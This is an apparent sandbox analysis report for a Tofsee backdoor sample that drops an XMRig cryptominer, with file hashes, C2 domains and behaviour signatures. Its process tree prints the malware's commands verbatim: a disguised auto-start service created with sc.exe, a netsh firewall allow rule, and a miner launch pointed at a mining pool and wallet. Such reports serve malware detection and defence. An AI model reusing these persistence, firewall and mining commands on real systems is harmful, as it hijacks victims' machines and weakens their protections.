Overview

overview

10

Static

static

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/12/2022, 15:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    241KB

  • MD5

    3b53587307822e59eb2ac5c1849263c7

  • SHA1

    ccdfdf6ada38de1c9e7784fcc8852ebf58c5b940

  • SHA256

    56620ac330bd56eedb5dab95166a9b128bcb09783ac67caea3e84c8f218a0c8e

  • SHA512

    51986ad6bdeca247f3dbc48d4018fcd34dd39d8a16141ade4bd928537ffc68cdcdf692948b3b8b9d66fe5522b2361c2fdcfb7e4832e0fffbf381c1b83e1baeee

  • SSDEEP

    3072:BX8Gj9rLYT6iIqR5tWeAGf7zFrO3pUM0l3ChMLu/NHKH3SB7b/0w9yNHCDml:lV5rLYT6iIuWVK7BvyfHKXSZriCa

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4256
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\tyuswrup\
      2⤵
        PID:904
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wqsawqwp.exe" C:\Windows\SysWOW64\tyuswrup\
        2⤵
          PID:2012
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create tyuswrup binPath= "C:\Windows\SysWOW64\tyuswrup\wqsawqwp.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:384
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description tyuswrup "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1372
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start tyuswrup
          2⤵
          • Launches sc.exe
          PID:1768
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:4944
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 808
          2⤵
          • Program crash
          PID:644
      • C:\Windows\SysWOW64\tyuswrup\wqsawqwp.exe
        C:\Windows\SysWOW64\tyuswrup\wqsawqwp.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1304
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:1720
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2060
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4256 -ip 4256
        1⤵
          PID:4932

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\wqsawqwp.exe
          Filesize

          10.3MB

          MD5

          e7ee1e2e88b6b434d227ece4ff5a0273

          SHA1

          f8359602b641b014ae7c06302f280c71a8cb3130

          SHA256

          83fd0273d531d09d1c0b56608a9b1c0f0b73969ddafa941773fa0632b2590898

          SHA512

          f13f772bb7350bbc590112cebef8790c92f6e69b0777c18f6c0b63636a2c8390f4960d36767ce8de80592798ffb63ea0b64f8e3ea2bbd3cb61f6388d0959de65

          Download Submit

        • C:\Windows\SysWOW64\tyuswrup\wqsawqwp.exe
          Filesize

          10.3MB

          MD5

          e7ee1e2e88b6b434d227ece4ff5a0273

          SHA1

          f8359602b641b014ae7c06302f280c71a8cb3130

          SHA256

          83fd0273d531d09d1c0b56608a9b1c0f0b73969ddafa941773fa0632b2590898

          SHA512

          f13f772bb7350bbc590112cebef8790c92f6e69b0777c18f6c0b63636a2c8390f4960d36767ce8de80592798ffb63ea0b64f8e3ea2bbd3cb61f6388d0959de65

          Download Submit

        • memory/1304-148-0x0000000000400000-0x0000000000466000-memory.dmp

          Filesize

          408KB

          Download

        • memory/1304-146-0x0000000000573000-0x0000000000584000-memory.dmp

          Filesize

          68KB

          Download

        • memory/1720-158-0x0000000002B60000-0x0000000002B70000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1720-167-0x0000000007D90000-0x0000000007D97000-memory.dmp

          Filesize

          28KB

          Download

        • memory/1720-164-0x0000000007840000-0x0000000007C4B000-memory.dmp

          Filesize

          4.0MB

          Download

        • memory/1720-161-0x0000000002DF0000-0x0000000002DF5000-memory.dmp

          Filesize

          20KB

          Download

        • memory/1720-155-0x0000000002B50000-0x0000000002B56000-memory.dmp

          Filesize

          24KB

          Download

        • memory/1720-145-0x0000000000AC0000-0x0000000000AD5000-memory.dmp

          Filesize

          84KB

          Download

        • memory/1720-152-0x0000000002800000-0x0000000002A0F000-memory.dmp

          Filesize

          2.1MB

          Download

        • memory/1720-151-0x0000000000AC0000-0x0000000000AD5000-memory.dmp

          Filesize

          84KB

          Download

        • memory/1720-150-0x0000000000AC0000-0x0000000000AD5000-memory.dmp

          Filesize

          84KB

          Download

        • memory/2060-171-0x0000000000E00000-0x0000000000EF1000-memory.dmp

          Filesize

          964KB

          Download

        • memory/2060-176-0x0000000000E00000-0x0000000000EF1000-memory.dmp

          Filesize

          964KB

          Download

        • memory/4256-133-0x0000000000679000-0x0000000000689000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4256-134-0x0000000000610000-0x0000000000623000-memory.dmp

          Filesize

          76KB

          Download

        • memory/4256-135-0x0000000000400000-0x0000000000466000-memory.dmp

          Filesize

          408KB

          Download

        • memory/4256-143-0x0000000000400000-0x0000000000466000-memory.dmp

          Filesize

          408KB

          Download